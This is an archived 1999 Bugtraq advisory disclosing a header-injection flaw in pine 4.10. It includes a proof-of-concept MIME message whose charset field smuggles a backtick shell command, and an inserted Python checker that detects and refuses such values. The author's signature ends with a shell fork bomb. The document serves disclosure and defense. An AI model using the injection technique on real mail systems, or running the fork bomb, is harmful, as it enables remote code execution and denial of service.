 
Bugtraq mailing list archives
remote exploit on pine 4.10 - neverending story?
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 8 Feb 1999 00:22:17 +0100
Affected systems:
-----------------
  Any Un*x system running 'pine' up to version 4.10 (latest).
Compromise:
-----------
  Remote execution of arbitrary code when the message is viewed.
Details:
--------
  About five months ago, I reported a vulnerability in the metamail package used
  with pine. I also noticed that the '`' character is incorrectly expanded by
  pine. The problem has been ignored (probably no one understood what I was
  talking about? ;-). But no matter. An excerpt from /etc/mailcap:
  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
  '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
Impact:
-------
  And now, ladies and gentlemen - my old bug, reinvented. Usually, the above
  mailcap line is expanded to:
  [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
        '[a-z]'`" = iso-8859-1)
  Hmm, but take a look at this message:
************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker () eleet net>
To: Victim <victim () somewhere net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'
Make a wish...
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"
...it could be your last.
*************************** MIME MESSAGE ENDS ***************************
 The result is:
  [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
        '[A-Z]' '[a-z]'`" = iso-8859-1)
  ...and arbitrary code ('touch ME', encoded using the ${IFS} trick) is
  executed when the message is viewed.
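  A defensive check for the substitution described above, added here as example code (not from the post, pine or metamail): it parses Content-Type parameters, refuses to expand a mailcap %{charset} whose value falls outside a strict allow-list (single-quoting is not enough once the template nests the value inside backticks, as the execve trace shows), and flags headers whose parameters carry shell metacharacters. The allow-list regex, the metacharacter set and the sample headers are this example's own assumptions.

```python
import re
# /bin/sh metacharacters. Single-quoting is no fix: in the trace above the
# charset already sits inside echo '...' yet its backticks still break out.
SHELL_META = set("`$\\\"'|&;<>(){}*?~\n")
# Allow-list for values a mailcap command may interpolate (an assumption of
# this example; RFC 2045 token syntax itself permits "`", "$", "{" and "}").
SAFE_PARAM_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:+-]{0,39}$")
PARAM_RE = re.compile(r''';\s*([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^;\s]*)''')

def parse_content_type(header_value):
    """Split 'type/subtype; a=b; c="d"' into (mediatype, {name: value})."""
    mediatype = header_value.split(";", 1)[0].strip().lower()
    params = {}
    for name, value in PARAM_RE.findall(header_value):
        if len(value) > 1 and value[0] == value[-1] in "\"'":
            value = value[1:-1]  # strip one pair of quotes, keep body verbatim
        params[name.lower()] = value
    return mediatype, params

def expand_mailcap(template, params):
    """Substitute %{name} into a mailcap command, refusing any value outside
    the allow-list instead of trying to quote it."""
    def repl(m):
        value = params.get(m.group(1).lower(), "")
        if not SAFE_PARAM_RE.match(value):
            raise ValueError("refusing expansion: %s=%r" % (m.group(1), value))
        return value
    return re.sub(r"%\{([^}]+)\}", repl, template)

def find_suspicious_params(raw_message):
    """Detection: (header, name, value) for every MIME parameter in the
    message headers that contains a shell metacharacter."""
    hits = []
    for line in raw_message.splitlines():
        header, _, value = line.partition(":")  # body lines never match
        if header.lower() in ("content-type", "content-disposition"):
            for name, pvalue in parse_content_type(value)[1].items():
                if SHELL_META & set(pvalue):
                    hits.append((header, name, pvalue))
    return hits

# Constructed sample headers, modelled on the message quoted in the post.
SAMPLE = """\
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
Content-Type: TEXT/PLAIN; charset='US-ASCII'
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Disposition: attachment; filename="wish.c"
"""
MAILCAP_TEST = 'test "`echo %{charset} | tr \'[A-Z]\' \'[a-z]\'`" = iso-8859-1'
```

The boundary parameter passes the metacharacter scan even though it contains "=" and ":", so the detection helper does not flag ordinary multipart messages.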
Fix:
----
  Well, it's the second time I've reported problems with ` in headers.
  Maybe pine developers should wait a little longer ;-)
_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]